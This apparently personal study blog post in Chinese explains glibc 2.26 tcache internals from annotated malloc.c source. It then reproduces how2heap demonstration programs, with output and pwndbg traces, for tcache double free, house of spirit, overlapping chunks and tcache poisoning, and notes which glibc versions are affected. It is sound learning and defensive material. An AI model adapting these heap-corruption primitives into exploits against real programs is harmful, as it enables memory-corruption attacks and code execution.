tcache学习

tcache学习

五月 13, 2021

tcache简介

tcache 是 glibc 2.26 (ubuntu 17.10) 之后引入的一种技术(see commit),目的是提升堆管理的性能。但提升性能的同时舍弃了很多安全检查,也因此有了很多新的利用方式。

glibc用USE_TCACHE条件开启 tcache 机制以及编译相关代码。

示例源码均来自glibc2.26,基本都是在glibc-2.26/malloc/malloc.c

相关数据结构

宏定义

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#if USE_TCACHE
/* We want 64 entries. This is an arbitrary limit, which tunables can reduce. */
# define TCACHE_MAX_BINS 64
# define MAX_TCACHE_SIZE tidx2usize (TCACHE_MAX_BINS-1)

/* Only used to pre-fill the tunables. */
# define tidx2usize(idx) (((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)

/* When "x" is from chunksize(). */
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
/* When "x" is a user-provided size. */
# define usize2tidx(x) csize2tidx (request2size (x))

/* With rounding and alignment, the bins are...
idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit)
idx 1 bytes 25..40 or 13..20
idx 2 bytes 41..56 or 21..28
etc. */

/* This is another arbitrary limit, which tunables can change. Each
tcache bin will hold at most this number of chunks. */
# define TCACHE_FILL_COUNT 7
#endif


/*
REALLOC_ZERO_BYTES_FREES should be set if a call to
realloc with zero bytes should be the same as a call to free.
This is required by the C standard. Otherwise, since this malloc
returns a unique pointer for malloc(0), so does realloc(p, 0).
*/

#ifndef REALLOC_ZERO_BYTES_FREES
#define REALLOC_ZERO_BYTES_FREES 1
#endif

TCACHE_MAX_BINS是最大条目数,每个条目将尺寸相同的 tcache chunk 连接成一个单向链表,FILO,默认为64;

MAX_TCACHE_SIZE是 tcache chunk 的最大尺寸,chunk 的大小在 64 位机器上以 16 字节递增,从 24 到 1032 字节。32 位机器上则是以 8 字节递增,从 12 到 512 字节。所以 tcache bin 只用于存放 non-large 的 chunk;

tidx2usize(idx)用于计算tcache chunk size,传入下标idx,返回size;

csize2tidx(x)用于将chuncksize转化成idx;

usize2tidx(x)用于将提供给用户的size转化成idx;

TCACHE_FILL_COUNT表示每条链表的最大长度,默认为7

结构体tcache_entry和tcache_perthread_struct

tcache 引入了两个新的数据结构tcache_entrytcache_perthread_struct

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#if USE_TCACHE

/* We overlay this structure on the user-data portion of a chunk when
the chunk is stored in the per-thread cache. */
typedef struct tcache_entry
{
struct tcache_entry *next;
} tcache_entry;

/* There is one of these for each thread, which contains the
per-thread cache (hence "tcache_perthread_struct"). Keeping
overall size low is mildly important. Note that COUNTS and ENTRIES
are redundant (we could have just counted the linked list each
time), this is for performance reasons. */
typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread char tcache_shutting_down = 0;
static __thread tcache_perthread_struct *tcache = NULL;

tcache_entry就是tcache链表的节点,tcache_perthread_struct中包含一个指针数组entrys[TCACHE_MAX_BINS],用于存放(默认)64个 tcache bins 链表头的地址,还有一个counts[TCACHE_MAX_BINS]数组用于存放每条链表的长度,因为最长为7,所以用 char 类型足够。

需要注意的是和其他 bins 不同,tcache_entry的 next 指针在tcache_entry结构体的开始,而其他 bins 中类似功能的 fd 指针的位置在chunk+0x10的位置(64bit)。

静态变量tcache_shutting_down初始化为0表示tcache没有关闭,默认开启;

静态变量tcache初始化为NULL,一开始 tcache 没有初始化,在第一次 malloc 初始化堆时才初始化 tcache 并赋值到此处。

相关函数

tcache_init

tcache 初始化函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
static void
tcache_init(void)
{
mstate ar_ptr;
void *victim = 0;
const size_t bytes = sizeof (tcache_perthread_struct); //获取结构体ize以便后来malloc

if (tcache_shutting_down) //是否关闭tcache
return;

arena_get (ar_ptr, bytes); //获取分配区
victim = _int_malloc (ar_ptr, bytes); //申请内存
if (!victim && ar_ptr != NULL) //失败则重试
{
ar_ptr = arena_get_retry (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes);
}


if (ar_ptr != NULL) //分配区解锁
__libc_lock_unlock (ar_ptr->mutex);

/* In a low memory situation, we may not be able to allocate memory
- in which case, we just keep trying later. However, we
typically do this very early, so either there is sufficient
memory, or there isn't enough memory to do non-trivial
allocations anyway. */
if (victim)
{
tcache = (tcache_perthread_struct *) victim; //赋值给静态变量victim
memset (tcache, 0, sizeof (tcache_perthread_struct)); //清零
}

}
//将tcache_init函数宏定义为 MAY_INIT_TCACHE()
#define MAYBE_INIT_TCACHE() \
if (__glibc_unlikely (tcache == NULL)) \ //只有tcache还为NULL时才init
tcache_init();

#else
#define MAYBE_INIT_TCACHE()
#endif

可以看出 tcache 是存在于堆中的一块大 chunk,执行初始化函数时之前置NULL的静态变量tcache被赋值成这里 malloc 出来的大 chunk,在64位机器中 tcache size 一般为0x291

MAYBE_INIT_TCACHE__libc_malloc中被调用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes = request2size (bytes);
size_t tc_idx = csize2tidx (tbytes);

MAYBE_INIT_TCACHE ();

DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache
&& tcache->entries[tc_idx] != NULL)
{
return tcache_get (tc_idx);
}
DIAG_POP_NEEDS_COMMENT;
#endif

每次malloc都会执行MAYBE_INIT_TCACHE,但是因为里面的判断,只有第一次才会执行tcache_init

tcache_put

将 free 的 chunk 按照 size 加入到特定的 tcache bin 中

1
2
3
4
5
6
7
8
9
10
11
12
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk); //tcache_entry指针指向chunk数据部分
assert (tc_idx < TCACHE_MAX_BINS); //断言idx小于最大条目数
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e; //插入到link头部
++(tcache->counts[tc_idx]); //对应idx的count++
}

没有消除下一个 chunk 的 P 位

  • tcache_put会在_int_free中被调用

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    #if USE_TCACHE
    {
    size_t tc_idx = csize2tidx (size); //获取idx

    if (tcache //判断tcache是否初始化
    && tc_idx < mp_.tcache_bins //判断尺寸
    && tcache->counts[tc_idx] < mp_.tcache_count) //判断tcache bin是否装满
    {
    tcache_put (p, tc_idx);
    return;
    }
    }
    #endif

    仅判断如果长度在范围内且对应 tcache bin 未满,就执行tcache_put将 free 的 chunk 加入该链表。

  • _int_malloc中如果从 fastbin 中成功返回了一个需要的 chunk,那么对应 fastbin 中的其他 chunk 会被放进相应的 tcache bin 中,直到上限。需要注意的是两者都是 FIFO 策略,所以 chunks 在 tcache bin 的顺序和在 fastbin 中的顺序是反过来的。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    #if USE_TCACHE
    /* While we're here, if we see other chunks of the same size,
    stash them in the tcache. */
    size_t tc_idx = csize2tidx (nb);
    if (tcache && tc_idx < mp_.tcache_bins) //判断tcache是否初始化以及尺寸
    {
    mchunkptr tc_victim;

    /* While bin not empty and tcache not full, copy chunks over. */
    while (tcache->counts[tc_idx] < mp_.tcache_count
    && (pp = *fb) != NULL) //判断tcache bin未满且fast bin不空
    {
    REMOVE_FB (fb, tc_victim, pp); //取出fastbin头
    if (tc_victim != 0)
    {
    tcache_put (tc_victim, tc_idx); //放入tcache bin
    }
    }
    }
    #endif
  • smallbin 与 fastbin 类似,从中返回 chunk 时会把剩余 chunk 加入到 tcache bin 中直到上限

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    #if USE_TCACHE
    /* While we're here, if we see other chunks of the same size,
    stash them in the tcache. */
    size_t tc_idx = csize2tidx (nb);
    if (tcache && tc_idx < mp_.tcache_bins)
    {
    mchunkptr tc_victim;

    /* While bin not empty and tcache not full, copy chunks over. */
    while (tcache->counts[tc_idx] < mp_.tcache_count
    && (tc_victim = last (bin)) != bin) //判断smallbin不空
    {
    if (tc_victim != 0)
    {
    bck = tc_victim->bk;
    set_inuse_bit_at_offset (tc_victim, nb);
    if (av != &main_arena)
    set_non_main_arena (tc_victim); //取出smallbin尾
    bin->bk = bck;
    bck->fd = bin;

    tcache_put (tc_victim, tc_idx); //加入tcache bin头
    }
    }
    }
    #endif
  • 当fastbins和smallbins都不能满足条件就会在unsortedbins中寻找,在unsortedbin bin链上寻找时,每一个符合要求的 chunk 都会优先被放入 tcache,而不是直接返回(除非tcache被装满)。寻找结束后,tcache 会返回其中一个。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    #if USE_TCACHE
    /* Fill cache first, return to user only if cache fills.
    We may return one of these chunks later. */
    if (tcache_nb
    && tcache->counts[tc_idx] < mp_.tcache_count)
    {
    tcache_put (victim, tc_idx);
    return_cached = 1;
    continue;
    }
    else
    {
    #endif

tcache_get

从指定 idx 的 tcache bin 头部取出一个 chunk

1
2
3
4
5
6
7
8
9
10
11
12
13
/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx]; //获得指定idx的tcache bin头部的一个chunk
assert (tc_idx < TCACHE_MAX_BINS); //断言idx小于最大条目数
assert (tcache->entries[tc_idx] > 0); //断言头节点>0
tcache->entries[tc_idx] = e->next; //entries[idx]指向第二个chunk,使其成为新的头节点
--(tcache->counts[tc_idx]); //对应idx的count--
return (void *) e;
}

  • tcache_get会在__libc_malloc调用_int_malloc之前被调用(在之前展示过的初始化之后),所以malloc 时时若条件满足会优先从tcache中返回一个chunk。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    #if USE_TCACHE
    /* int_free also calls request2size, be careful to not pad twice. */
    size_t tbytes = request2size (bytes);
    size_t tc_idx = csize2tidx (tbytes);

    MAYBE_INIT_TCACHE ();

    DIAG_PUSH_NEEDS_COMMENT;
    if (tc_idx < mp_.tcache_bins //尺寸
    /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
    && tcache //初始化
    && tcache->entries[tc_idx] != NULL) //链表头非空
    {
    return tcache_get (tc_idx);
    }
    DIAG_POP_NEEDS_COMMENT;
    #endif

    此处仅仅检查了tcache->entries[tc_idx] != NULL,可能存在 uaf 或者堆溢出漏洞可以设置处于 tcache bin 中 chunk 的数据来实现任意位置 malloc ,这周攻击方式叫 tcache poisoning。

  • 在 unsortedbin 中寻找 chunk 时,如果在 tcache 中放入 unsortedbin chunk 达到上限,则会直接返回最后一个 chunk。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    #if USE_TCACHE
    /* If we've processed as many chunks as we're allowed while
    filling the cache, return one of the cached ones. */
    ++tcache_unsorted_count;
    if (return_cached
    && mp_.tcache_unsorted_limit > 0
    && tcache_unsorted_count > mp_.tcache_unsorted_limit)
    {
    return tcache_get (tc_idx);
    }
    #endif

    但是默认情况下没有限制,这段代码也不会执行:

    1
    .tcache_unsorted_limit = 0 /* No limit.  */
  • 在 unsortedbin 中寻找 chunk 时,如果之前曾放入过 tcache 块,则会取出一个并返回。

    1
    2
    3
    4
    5
    6
    7
    #if USE_TCACHE
    /* If all the small chunks we found ended up cached, return one now. */
    if (return_cached)
    {
    return tcache_get (tc_idx);
    }
    #endif

tcache bins 中的 chunk 不会被合并,无论是相邻 chunk 还是 top chunk。

tcache_thread_freeres

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
static void __attribute__ ((section ("__libc_thread_freeres_fn")))
tcache_thread_freeres (void)
{
int i;
tcache_perthread_struct *tcache_tmp = tcache;

if (!tcache)
return;

tcache = NULL; //tcache置空,使之后的free操作不会再把chunk放进tcache bins

for (i = 0; i < TCACHE_MAX_BINS; ++i) //遍历tcache bins将这些chunk free掉
{
while (tcache_tmp->entries[i])
{
tcache_entry *e = tcache_tmp->entries[i];
tcache_tmp->entries[i] = e->next;
__libc_free (e);
}
}

__libc_free (tcache_tmp); //free掉tcache_perthread_struct结构体

tcache_shutting_down = 1; //设置静态变量
}

利用

tcache 分配和释放都只检查了 tcache 相关结构体的一些数据,没有前后检查等其他的检查,而且 tcache 相关代码比其他 bins 更优先,原先的很多检查机制都不会执行,所以 tcache 技术虽然提升了效率,但安全性却很差。

tcache_dup

1
2
3
4
5
6
7
8
9
10
11
12
13
14
//代码嫖自how to heap
#include <stdlib.h>
#include <stdio.h>

int main() {
void *p1 = malloc(0x10);
fprintf(stderr, "1st malloc(0x10): %p\n", p1);
fprintf(stderr, "Freeing the first one\n");
free(p1);
fprintf(stderr, "Freeing the first one again\n");
free(p1);
fprintf(stderr, "2nd malloc(0x10): %p\n", malloc(0x10));
fprintf(stderr, "3rd malloc(0x10): %p\n", malloc(0x10));
}
1
2
3
4
5
6
$ ./a.out 
1st malloc(0x10): 0x559da9a7b260
Freeing the first one
Freeing the first one again
2nd malloc(0x10): 0x559da9a7b260
3rd malloc(0x10): 0x559da9a7b260

tcache_dup 比 fastbin_dup 更简单,因为 tcache 没有连续两次 free 同一个指针的检查,就不用在中间 free 一个别的指针绕过,而且 tcache 不会与 top chunk 合并,还有 tcache 的范围比 fastbin 更大,会有更大的适用空间。glibc中依然可用,glibc2.31不可用。

tcache_house_of_spirit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
//代码嫖自how to heap
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
malloc(1); // init heap

fprintf(stderr, "We will overwrite a pointer to point to a fake 'smallbin' region.\n");
unsigned long long *a, *b;
unsigned long long fake_chunk[64] __attribute__ ((aligned (16)));

fprintf(stderr, "The chunk: %p\n", &fake_chunk[0]);

fake_chunk[1] = 0x110; // the size
memset(fake_chunk+2, 0x41, sizeof(fake_chunk)-0x10);

fprintf(stderr, "Overwritting our pointer with the address of the fake region inside the fake chunk, %p.\n", &fake_chunk[0]);
a = &fake_chunk[2];

fprintf(stderr, "Freeing the overwritten pointer.\n");
free(a);

fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunk[0], &fake_chunk[2]);
b = malloc(0x100);
memset(fake_chunk+2, 0x42, sizeof(fake_chunk)-0x10);
fprintf(stderr, "malloc(0x100): %p\n", b);
}
1
2
3
4
5
6
7
$ ./a.out 
We will overwrite a pointer to point to a fake 'smallbin' region.
The chunk: 0x7ffe949cb950
Overwritting our pointer with the address of the fake region inside the fake chunk, 0x7ffe949cb950.
Freeing the overwritten pointer.
Now the next malloc will return the region of our fake chunk at 0x7ffe949cb950, which will be 0x7ffe949cb960!
malloc(0x100): 0x7ffe949cb960

tcache 释放 chunk 时没有对前后 chunk 进行检验,只需要释放的 chunk 对齐就能释放到 tcache bins 中,而且同样因为 tcach 的范围比 fastbin 大,适用范围扩大到包括 snallbin 的大小。此漏洞在glibc2.31中依然可以利用。

tcache_overlapping_chunks

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
//代码嫖自how to heap
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

int main() {
intptr_t *p1, *p2, *p3;

p1 = malloc(0x50 - 8);
p2 = malloc(0x20 - 8);
memset(p1, 0x41, 0x50-8);
memset(p2, 0x41, 0x30-8);
fprintf(stderr, "Allocated victim chunk with requested size 0x48: %p\n", p1);
fprintf(stderr, "Allocated sentry element after victim: %p\n", p2);

int evil_chunk_size = 0x110;
int evil_region_size = 0x110 - 8;
fprintf(stderr, "Emulating corruption of the victim's size to 0x110\n");
*(p1-1) = evil_chunk_size;
fprintf(stderr, "Freed victim chunk to put it in a different tcache bin\n");
free(p1);

p3 = malloc(evil_region_size);
memset(p3, 0x42, evil_region_size);
fprintf(stderr, "Requested a chunk of 0x100 bytes\n");
fprintf(stderr, "p3: %p ~ %p\n", p3, (char *)p3+evil_region_size);
fprintf(stderr, "p2: %p ~ %p\n", p2, (char *)p2+0x20-8);
}
1
2
3
4
5
6
7
8
9
$ ./a.out 
Allocated victim chunk with requested size 0x48: 0x55c34c1c12a0
Allocated sentry element after victim: 0x55c34c1c12f0
Emulating corruption of the victim's size to 0x110
Freed victim chunk to put it in a different tcache bin
Requested a chunk of 0x100 bytes
p3: 0x55c34c1c12a0 ~ 0x55c34c1c13a8
p2: 0x55c34c1c12f0 ~ 0x55c34c1c1308

_int_freetcache_put之前没有对 chunk 进行前后检查,可以直接修改 size 再将其 free 放进修改后size对应的 tcache bin 中,malloc 时也可以直接将其返回,相当于可以随意修改 size 造成堆块重叠。glibc2.31中依然可用。

tcache_poisoning

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
///代码嫖自how to heap
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

int main() {
intptr_t *p1, *p2, *p3;
size_t target[10];
printf("Our target is a stack region at %p\n", (void *)target);

p1 = malloc(0x30);
memset(p1, 0x41, 0x30+8);
fprintf(stderr, "Allocated victim chunk with requested size 0x30 at %p\n", p1);

fprintf(stderr, "Freed victim chunk to put it in a tcache bin\n");
free(p1);
fprintf(stderr, "Emulating corruption of the next ptr\n");
*p1 = (int64_t)target;

fprintf(stderr, "Now we make two requests for the appropriate size so that malloc returns a chunk overlapping our target\n");
p2 = malloc(0x30);
memset(p2, 0x42, 0x30+8);
p3 = malloc(0x30);
memset(p3, 0x42, 0x30+8);
fprintf(stderr, "The first malloc(0x30) returned %p, the second one: %p\n", p2, p3);
}
1
2
3
4
5
6
7
$ ./a.out 
Our target is a stack region at 0x7ffe4e15dfd0
Allocated victim chunk with requested size 0x30 at 0x561c45845670
Freed victim chunk to put it in a tcache bin
Emulating corruption of the next ptr
Now we make two requests for the appropriate size so that malloc returns a chunk overlapping our target
The first malloc(0x30) returned 0x561c45845670, the second one: 0x7ffe4e15dfd0

通过修改 tcache bin 中 chunk 的 fd 指针,使其指向任意位置,同时也就修改了 tcache_entry 的 next 指针,malloc 时将从此指针指向的地址返回 chunk,__libc_malloc中在tcache_get之前只检查了tcache->entries[tc_idx] != NULL,没有检查 count。

修改指针前:

1
2
3
pwndbg> tcachebins 
tcachebins
0x40 [ 1]: 0x55555555b670 ◂— 0x0

count 为1,链表中也只有一个节点。

修改指针后:

1
2
3
pwndbg> tcachebins 
tcachebins
0x40 [ 1]: 0x55555555b670 —▸ 0x7fffffffdeb0 ◂— ...

可以看到虽然 count 依然为1,但链表中已经加入了我们的 target。

第一次 malloc 后:

1
2
3
pwndbg> tcachebins 
tcachebins
0x40 [ 0]: 0x7fffffffdeb0 ◂— ...

count 减为0,但此时链表中还有 target。

第二次 malloc 后:

1
2
3
pwndbg> tcachebins 
tcachebins
0x40 [ -1]: 0

count 减成了-1,target 成功取出。

此漏洞在glibc2.27中依然可用,glibc2.31中已被修复,加入了对 count 的检查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
//glibc-2.31/malloc/malloc.c __libc_malloc()
#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes;
if (!checked_request2size (bytes, &tbytes))
{
__set_errno (ENOMEM);
return NULL;
}
size_t tc_idx = csize2tidx (tbytes);

MAYBE_INIT_TCACHE ();

DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins
&& tcache
&& tcache->counts[tc_idx] > 0)
{
return tcache_get (tc_idx);
}
DIAG_POP_NEEDS_COMMENT;
#endif